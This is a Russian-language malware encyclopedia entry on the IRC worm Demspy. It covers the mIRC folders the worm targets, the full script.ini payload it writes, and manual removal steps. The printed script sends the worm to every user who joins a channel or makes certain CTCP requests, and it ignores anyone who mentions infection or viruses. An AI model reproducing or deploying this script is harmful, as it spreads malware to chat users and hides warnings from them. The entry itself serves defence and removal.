Материал из Total Malware Info

IRC-Worm.Win32.Demspy Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 8 192 байт.

Содержание 1 Деструктивная активность 2 = 3 = 3.1 Рекомендации по удалению

Деструктивная активность

Ищет файл script.ini в следующих папках:

C:\mirc
C:\mirc32
C:\archivos de programa\mirc
C:\archivos de programa\mirc32
C:\program files\mirc
C:\program files\mirc32

и записывает в него следующие строки:

[script]
n0=ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick   <исполняемый файл червя>             C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n1=ON 1:TEXT:*script.ini*:#:/ignore $nick
 n2=ON 1:TEXT:*script.ini*:?:/ignore $nick
 n3=ON 1:TEXT:*infected*:#:/ignore $nick
 n4=ON 1:TEXT:*infected*:?:/ignore $nick
 n5=ON 1:TEXT:*viru*:#:/ignore $nick
 n6=ON 1:TEXT:*viru*:?:/ignore $nick
 n7=ON 1:TEXT:*worm*:#:/ignore $nick
 n8=ON 1:TEXT:*worm*:?:/ignore $nick
 n9=ON 1:TEXT:*IRC.Worm*:#:/ignore $nick
 n10=ON 1:TEXT:*IRC.Worm*:?:/ignore $nick
 n11=ON 1:TEXT:*LBV*:#:/ignore $nick
 n12=ON 1:TEXT:*LBV*:?:/ignore $nick
 n13=ON 1:TEXT:*send*:?:{ /dcc send $nick C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n14=ctcp 1:*PING*:{ /dcc send $nick      C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n15=ctcp 1:*FINGER*:{ /dcc send $nick    C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n16=ctcp 1:*TIME*:{ /dcc send $nick      C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n17=ctcp 1:*VERSION*:{ /dcc send $nick   C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n18=ctcp 1:*USERINFO*:{ /dcc send $nick  C:\mirc | /ignore $nick }
                                                                                                                                                                                                                                                              n19=; IRC.Worm.Demo32 by The Spy

Данный скрипт рассылает исполняемый файл червя используя сервис DCC всем присоединяющимся к каналу клиентам.

=

=

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. При помощи ("Диспетчера задач") завершить процесс червя.
2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
3. Удалить параметр в ключе реестра (как работать с реестром?):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“System”=”<путь и имя исполняемого файла червя>”